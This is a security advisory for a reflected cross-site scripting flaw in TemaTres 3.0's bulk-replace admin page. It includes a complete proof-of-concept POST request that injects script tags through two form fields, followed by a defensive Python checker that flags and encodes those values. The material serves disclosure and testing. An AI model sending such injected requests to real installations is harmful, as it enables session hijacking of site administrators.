CVE-2019-14344 — TemaTres 3.0 — Cross-site scripting reflected (XSS)
TemaTres: controlled vocabulary server 3.0 — XSS
The POST parameters “replace_string” and “search_string” are vulnerable to reflected XSS.
Proof Of Concept
POST /tematres3.0/vocab/admin.php?doAdmin=bulkReplace HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 231
Connection: close
Referer: http://localhost/tematres3.0/vocab/admin.php?doAdmin=bulkReplace
Cookie: PHPSESSID=9ver4jrlkaqi9rid65muvtok9a
Upgrade-Insecure-Requests: 1

ws=t&search_string=%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&replace_string=%22%3E%3Cscript%3Ealert%28%22XSS1%22%29%3C%2Fscript%3E&boton=Vista+previa&taskAdmin=bulkReplace&replaceStep=bulkReplaceTest&doAdmin=bulkReplace
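
An added example, not from the advisory or from TemaTres: a Python check that decodes the body of a bulkReplace POST, flags HTML metacharacters in the two reflected parameters, and shows each value after output encoding. The function name, the metacharacter set and the benign sample body are assumptions made for this example.

```python
import html
import re
from urllib.parse import parse_qs

# The two parameters the advisory reports as reflected by
# admin.php?doAdmin=bulkReplace.
REFLECTED_PARAMS = ("search_string", "replace_string")

# Assumption for this example: characters that let a value break out of
# an HTML attribute or text node.
HTML_META = re.compile(r"[<>\"']")


def audit_bulk_replace_body(body):
    """Return {param: [finding, ...]} for the reflected parameters."""
    fields = parse_qs(body, keep_blank_values=True)
    report = {}
    for name in REFLECTED_PARAMS:
        for value in fields.get(name, []):
            report.setdefault(name, []).append({
                "raw": value,
                "suspicious": bool(HTML_META.search(value)),
                # Encoding on output is the fix for reflection; html.escape
                # with quote=True also encodes " and '.
                "encoded": html.escape(value, quote=True),
            })
    return report


# Form body taken from the proof-of-concept request above.
POC_BODY = (
    "ws=t&search_string=%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E"
    "&replace_string=%22%3E%3Cscript%3Ealert%28%22XSS1%22%29%3C%2Fscript%3E"
    "&boton=Vista+previa&taskAdmin=bulkReplace"
    "&replaceStep=bulkReplaceTest&doAdmin=bulkReplace"
)
# Constructed benign body for contrast (not from the advisory).
BENIGN_BODY = (
    "ws=t&search_string=colour&replace_string=color&boton=Vista+previa"
    "&taskAdmin=bulkReplace&replaceStep=bulkReplaceTest&doAdmin=bulkReplace"
)

if __name__ == "__main__":
    for label, body in (("poc", POC_BODY), ("benign", BENIGN_BODY)):
        for name, findings in audit_bulk_replace_body(body).items():
            for f in findings:
                print(label, name, f["suspicious"], f["encoded"])
```

The encoded form is what a fixed page would write into the response, so the same function can serve as a regression check once the application encodes these fields on output.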